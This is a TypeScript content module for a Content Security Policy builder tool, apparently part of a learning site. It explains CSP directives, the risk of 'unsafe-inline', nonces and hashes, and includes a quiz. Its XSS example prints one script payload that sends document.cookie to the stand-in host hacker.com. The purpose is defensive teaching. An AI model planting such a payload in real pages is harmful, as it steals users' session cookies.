import { ToolContent } from '../../registry/types';

export const cspBuilder: ToolContent = {
  detailedDescription: `
# KaruviLab Elite Learning Hub: Content Security Policy (CSP) Engineering

Welcome to the engineering guide to Content Security Policy. This handbook explains the ultimate defense-in-depth mechanism against Cross-Site Scripting (XSS), and why most developers configure it completely wrong.

---

## 1. Prerequisites: The XSS Threat

Imagine you build a comment section on your blog. A hacker submits a comment containing:
\`<script>fetch('http://hacker.com/?cookie=' + document.cookie)</script>\`

If you don't sanitize this input, the browser renders the \`<script>\` tag and executes it. The hacker just stole the session cookie of every person who views the comment.

**The Solution:** The \`Content-Security-Policy\` HTTP Header.
CSP is a strict whitelist sent by your web server. It tells the browser exactly which domains are allowed to load scripts, images, and styles. If a script isn't on the list, the browser flat-out refuses to execute it.

---

## 2. Core Concepts: Directives and Sources

A CSP is built using Directives (what type of file) and Sources (where it can come from).

\`Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.google.com; img-src *;\`

- \`default-src 'self'\`: By default, only load resources from my own domain.
- \`script-src 'self' https://apis.google.com\`: Only allow JavaScript from my domain AND Google's API domain. **(This blocks the hacker's inline script!)**
- \`img-src *\`: Allow images from literally anywhere.

---

## 3. The Fatal Flaw: 'unsafe-inline'

Many developers get frustrated when adding CSP because it breaks their inline scripts (\`<script>console.log("hello")</script>\`) and inline styles (\`<div style="color: red">\`). 
To "fix" this, they add \`'unsafe-inline'\` to their policy:

\`script-src 'self' 'unsafe-inline'\`

🚨 **CRITICAL SECURITY FAILURE:** By adding \`'unsafe-inline'\`, you have completely disabled CSP's protection against XSS. You are explicitly telling the browser: *"Please execute any random script tag you find in the HTML."* This is exactly what the hacker relies on.

---

## 4. Advanced Security: Nonces and Hashes

How do you allow *your* inline scripts to run, but block the *hacker's* inline scripts?

**1. The Nonce (Number Used Once):**
Your server generates a massive, random cryptographically secure string (e.g., \`8a9b2c...\`) for every single page load.
- You send the header: \`script-src 'nonce-8a9b2c...'\`
- You write your script: \`<script nonce="8a9b2c...">...</script>\`
Because the hacker doesn't know the random nonce for this specific page load, they cannot add it to their malicious injected script. The browser executes your script and blocks the hacker's.

**2. The Hash:**
You can calculate the SHA-256 hash of your script's exact contents and whitelist that specific hash.
- Header: \`script-src 'sha256-xyz123...'\`
If a hacker alters even one space in the script, the hash changes, and the browser blocks it.

---

## 5. Threat Model & Reporting

| Threat | Defended By | Explanation |
|--------|-------------|-------------|
| **Stored XSS** | ✅ CSP Whitelist | The browser refuses to execute unauthorized injected \`<script>\` tags. |
| **Data Exfiltration** | ✅ \`connect-src\` | Even if a hacker finds a zero-day exploit to run code, if \`connect-src\` is strictly defined to only allow API calls to your own server, the hacker's script cannot send the stolen data to \`hacker.com\`. |
| **Clickjacking** | ✅ \`frame-ancestors\` | Prevents a malicious site from embedding your banking app inside an invisible \`<iframe>\` and tricking the user into clicking transfer buttons. |

### The Report-URI
You can instruct browsers to silently report any blocked scripts to an endpoint using \`report-uri /csp-violation-endpoint\`. This allows security teams to detect XSS attacks happening to their users in real-time.

---

## 6. Standards & References
- **W3C CSP Level 3:** The current living standard dictating strict nonces, hashes, and \`strict-dynamic\`.
- **MDN Web Docs:** Content Security Policy reference.

---

## 7. Interactive Quiz

**Beginner:**
1. What is the primary purpose of CSP? *(Answer: To act as a strict whitelist that tells the browser exactly which scripts and resources are safe to execute, preventing Cross-Site Scripting (XSS)).*

**Intermediate:**
2. Why is adding \`'unsafe-inline'\` to your policy dangerous? *(Answer: Because it tells the browser to execute any inline \`<script>\` tag it finds, which completely defeats the purpose of CSP and allows hackers to inject malicious code).*

**Advanced:**
3. If you want to use inline scripts safely, what mechanism must you use instead of \`'unsafe-inline'\`? *(Answer: You must use a cryptographically secure, one-time 'Nonce' generated by the server, or explicitly whitelist the SHA-256 'Hash' of the script's exact contents).*

---

`,
  howTo: [
    "**Step 1:** Use the UI toggles to select which resources (Scripts, Images, Fonts) you want to allow.",
    "**Step 2:** Specify the exact domains you trust for each resource type.",
    "**Step 3:** (Advanced) Configure Nonces or Hashes if you require strict inline script execution.",
    "**Step 4:** Copy the generated Nginx, Apache, or Node/Express header configuration and paste it into your server."
  ],
  faq: [
    {
      question: "Will adding a CSP break my website?",
      answer: "Yes, it is highly likely to break things initially if you use third-party tools like Google Analytics or inline styles. You should always deploy a CSP using the 'Content-Security-Policy-Report-Only' header first, which logs errors without actually blocking the code, allowing you to fine-tune the whitelist."
    }
  ],
  useCases: [],
  examples: [],
  commonErrors: [],
  alternatives: ["OAuth Token Decoder", "SAML Decoder"]
};
